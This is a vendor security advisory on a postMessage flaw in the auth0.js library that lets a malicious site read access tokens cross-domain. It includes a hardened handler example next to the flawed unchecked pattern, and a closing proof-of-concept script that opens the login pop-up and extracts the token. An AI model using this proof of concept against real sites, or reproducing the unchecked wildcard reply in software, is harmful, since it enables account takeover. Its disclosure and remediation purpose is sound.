AppCheck discovered a security flaw within the auth0.js JavaScript library that could be exploited by a malicious website to read sensitive access tokens cross-domain.
Auth0 provides authentication solutions for a variety of platforms including the ability to integrate social media authentication into an application.
“We solve the most complex identity use cases with an extensible and easy to integrate platform that secures billions of logins every month” – https://auth0.com/
AppCheck identified a security flaw within the Social Media authentication flow employed by the auth0.js client library. In brief, the following authentication flow is followed when authenticating via Facebook or Google using auth0.js:
The vulnerability arises because neither the origin nor the target of the postMessage events exchanged between the pop-up window and the requesting page is validated: the message event handlers process messages from, and reply to, any website that sends them. A malicious web page can therefore open the pop-up for an already authenticated user and intercept the sensitive access token. The attacker could then use the token to carry out actions on behalf of the user or to read sensitive user information.
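The missing checks described above are the two halves of the standard postMessage defence: verify `event.origin` against an allow-list before acting on a message, and pass the verified origin (never `'*'`) as the `targetOrigin` of any reply. The following is an added example written for this article, not code from auth0.js or from AppCheck; the allow-listed origin, the message shape (`{"a":"request"}`), the token value and the tiny stand-in for a browser window are all constructed for illustration. The unchecked handler is included only to contrast with the hardened one.

```javascript
// Added example (not auth0.js or AppCheck code): a pop-up side message handler
// that validates the sender's origin and binds its reply to that origin.
// Origins, message shape and token below are constructed for illustration.

const TRUSTED_OPENER_ORIGINS = new Set(['https://app.example.com']); // assumed opener

// Parse a postMessage payload defensively: any page can send any string.
function parseMessage(raw) {
  if (typeof raw !== 'string') return null;
  try {
    const msg = JSON.parse(raw);
    return msg && typeof msg === 'object' ? msg : null;
  } catch (_) {
    return null;
  }
}

// Hardened handler. Returns a record of the decision so it can be logged and tested.
function handleTokenRequest(event, accessToken, trusted = TRUSTED_OPENER_ORIGINS) {
  // 1. Origin check: drop anything that did not come from the expected opener.
  if (!trusted.has(event.origin)) {
    return { action: 'ignored', reason: 'untrusted-origin', origin: event.origin };
  }
  // 2. Only answer the window that actually sent the message.
  if (!event.source || typeof event.source.postMessage !== 'function') {
    return { action: 'ignored', reason: 'no-source' };
  }
  const msg = parseMessage(event.data);
  if (!msg || msg.a !== 'request') {
    return { action: 'ignored', reason: 'bad-message' };
  }
  // 3. Bind the reply to the verified origin; '*' would let any window read it.
  event.source.postMessage(
    JSON.stringify({ a: 'token', access_token: accessToken }),
    event.origin
  );
  return { action: 'replied', targetOrigin: event.origin };
}

// Unchecked handler, mirroring the flawed pattern: no origin check, wildcard reply.
function handleTokenRequestUnchecked(event, accessToken) {
  const msg = JSON.parse(event.data);
  if (msg.a === 'request') {
    event.source.postMessage(JSON.stringify({ a: 'token', access_token: accessToken }), '*');
    return { action: 'replied', targetOrigin: '*' };
  }
  return { action: 'ignored' };
}

// Minimal stand-in for a window, recording what it receives (constructed).
function fakeWindow() {
  const received = [];
  return { received, postMessage(data, targetOrigin) { received.push({ data, targetOrigin }); } };
}

// Constructed demonstration: a request from an origin not on the allow-list is
// dropped by the hardened handler but answered by the unchecked one.
function demo() {
  const other = fakeWindow();
  const evt = { origin: 'https://other.example.net', source: other, data: '{"a":"request"}' };
  const hardened = handleTokenRequest(evt, 'TOKEN-constructed');
  const unchecked = handleTokenRequestUnchecked(evt, 'TOKEN-constructed');
  return { hardened, unchecked, leaked: other.received.length };
}

console.log(JSON.stringify(demo(), null, 2));
```

In a real pop-up the allow-list would be derived from the application's registered callback origins rather than hard-coded, and the same check belongs on the opener's side: the requesting page should likewise verify `event.origin` before trusting a token it receives.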
AppCheck was able to detect this security flaw without any specific updates, reporting the vulnerability as “HTML5 postMessage information disclosure”. However, a specific plugin has been added to properly categorise the vulnerability to aid in remediation:
Developers using the auth0.js library need to upgrade to the latest version: 8.12.
Further details can be found on the vendor's official website:
https://auth0.com/docs/security/bulletins/cve-2017-17068
The following Proof of Concept JavaScript can be used to demonstrate the vulnerability. The auth_url variable should be populated with the pop-up URL used in the target authentication flow.

    <script>
    function request_token(event) {
      // when a message is received, send back a request for the access_token
      var data = JSON.parse(event.data);
      if (data.a == "ready") {
        window.poc.postMessage('{"a":"request"}', '*');
      } else {
        alert(JSON.stringify(data));
      }
    }
    function popup() {
      var auth_url = "https://<target URL>/authorize?client_id=<client_id>&response_type=token&connection=facebook....";
      window.poc = window.open(auth_url);
    }
    window.addEventListener("message", request_token);
    </script>
AppCheck is a software security vendor based in the UK, offering a leading security scanning platform that automates the discovery of security flaws within organisations' websites, applications, network and cloud infrastructure. AppCheck is authorized by the Common Vulnerabilities and Exposures (CVE) Program as a CVE Numbering Authority (CNA).